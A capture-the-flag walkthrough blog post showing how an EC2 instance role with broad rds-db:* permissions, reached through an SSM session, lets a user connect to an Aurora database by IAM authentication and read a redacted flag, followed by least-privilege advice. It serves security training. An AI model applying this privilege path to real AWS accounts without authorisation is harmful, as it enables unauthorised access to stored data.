CTF Walkthrough: pentesting.cloud "Aurora Borealis"
Steven Smiley
Posted on January 22, 2023
The pentesting.cloud
challenge Aurora Borealis asks us to understand the permissions and processes to connect to Aurora databases with AWS IAM authentication. It creates an Amazon Aurora DB based on a snapshot with unknown contents and configuration, an EC2 instance, and limited user permissions.
Finding a starting point
We examine the IAM roles and policies in the environment, and see that there's an EC2 instance role that can rds-db:*
on arn:aws:rds-db:us-west-2:*:dbuser:*/us-west-2
. The rds-db:*
includes all RDS IAM actions, including connecting to the database. It's important to read that ARN carefully because it reveals the database username we'll need. The ARN format of a db-user is arn:${Partition}:rds-db:${Region}:${Account}:dbuser:${DbiResourceId}/${DbUserName}
. That's right, the username is us-west-2
, it's not referring to the region.
Since the permissions belong to the EC2 instance, we need to connect from there. Conveniently, pentesting-user
can ssm:StartSession
on that instance.
Connecting to the DB
We start an SSM session on the EC2 instance so we can use its permissions to connect to the RDS database using IAM authentication. We'll first need to install the mysql client, download the SSL certificate, and generate an authentication token for the user.
sh-4.2$ sudo yum install mysql
sh-4.2$ wget https://truststore.pki.rds.amazonaws.com/us-west-2/us-west-2-bundle.pem
sh-4.2$ RDSHOST="aurora-dbcluster-yjt22bb5xqez.cluster-cmugjtcpbuo6.us-west-2.rds.amazonaws.com"
sh-4.2$ TOKEN="$(aws rds generate-db-auth-token --hostname $RDSHOST --port 1337 --region us-west-2 --username us-west-2)"
sh-4.2$ mysql --host=$RDSHOST --port=1337 --ssl-ca=us-west-2-bundle.pem --user=us-west-2 --password=$TOKEN
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 24
Server version: 5.7.12 MySQL Community Server (GPL)
MySQL [(none)]>
With the MySQL connection, let's explore the database to find the flag.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flags |
+--------------------+
MySQL [(none)]> use flags;
Database changed
MySQL [flags]> show tables;
+-----------------+
| Tables_in_flags |
+-----------------+
| flag |
+-----------------+
MySQL [flags]> describe flag;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| flag | varchar(100) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
MySQL [flags]> select * from flag;
+----------------------------------+
| flag |
+----------------------------------+
| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |
+----------------------------------+
Improving AWS data protection
This challenge didn't involve many steps, but required understanding AWS IAM authentication to RDS. To improve data protection with RDS:
- Be cognizant of the enabled authentication mechanisms
- Grant users the minimum permissions to perform their duties
- As much as possible, keep people away from data, limiting potential access vectors
Posted on January 22, 2023
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.